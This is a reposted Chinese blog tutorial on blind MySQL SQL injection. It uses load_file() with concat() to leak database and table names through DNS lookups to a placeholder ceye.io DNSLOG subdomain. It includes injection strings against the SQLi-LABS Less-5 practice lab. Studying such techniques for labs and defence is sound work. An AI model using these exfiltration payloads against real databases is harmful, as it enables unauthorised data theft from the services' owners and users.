[转]SQL注入奇巧淫技——利用DNSLOG获取看不到的信息

用法也很简单，只要有账户，便会给你提供一个二级域名XXX.ceye.io，我们只要将信息放在三级域名那就可以收到信息了，例如上面几个例子，访问aaa.XXX.ceye.io，这个信息就被记录下来了。（个人感觉挺好的，除了访问速度稍微慢了些…）

附：http://ceye.io/payloads 各种情况下ceye.io的使用方法

在这里介绍一下mysql中load_file()函数

LOAD_FILE(file_name)
读取文件并返回文件内容为字符串。要使用此函数，文件必须位于服务器主机上，必须指定完整路径的文件，而且必须有FILE权限。 该文件所有字节可读，但文件内容必须小于max_allowed_packet。
如果该文件不存在或无法读取，因为前面的条件之一不满足，函数返回 NULL。
在MySQL5.0.19，character_set_filesystem系统变量控制文件名的解释，即仅作文字字符串。

【转】MYSQL注入中load_file()函数的进一步应用
原文发表于《黑客防线》2008年第11期

理论上，如果权限足够，可以读取服务器上任意文件

实际上load_file()函数还可以用来发送dns解析请求

接下来就尝试获取数据

利用payload是：load_file(concat('\\\\\\\\',(select database()),'.xxxx.ceye.io\\abc'))

concat是字符串拼接
database()就是你要做SQL注入查询的地方
‘.xxxx.ceye.io\abc’就是你的dnslog平台给你的域名
后面的abc可以改也可以不改，无所谓的，你乐意写啥就写啥

上面拼接的结果就是’\\\\ schema_name.XXXX.ceye.io\\abc’，其实相当于访问了带有数据库名称的三级域名，被dnslog捕获到了

例如SQLi-LABS 第五关：
payload?id=1' and if((select load_file(concat('\\\\',(select database()),'.XXXXX.ceye.io\\abc'))),1,1)--+

然后查看ceye，成功获取到了数据库名称
对于表段，由于load_file()一次只能传输一条数据，所以查询的时候需要使用limit来一个一个的解析。
http://127.0.0.1/sqli/Less-5/?id=1' and if((select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema='security' limit 0,1),'.XXXX.ceye.io\\abc'))),1,1)--+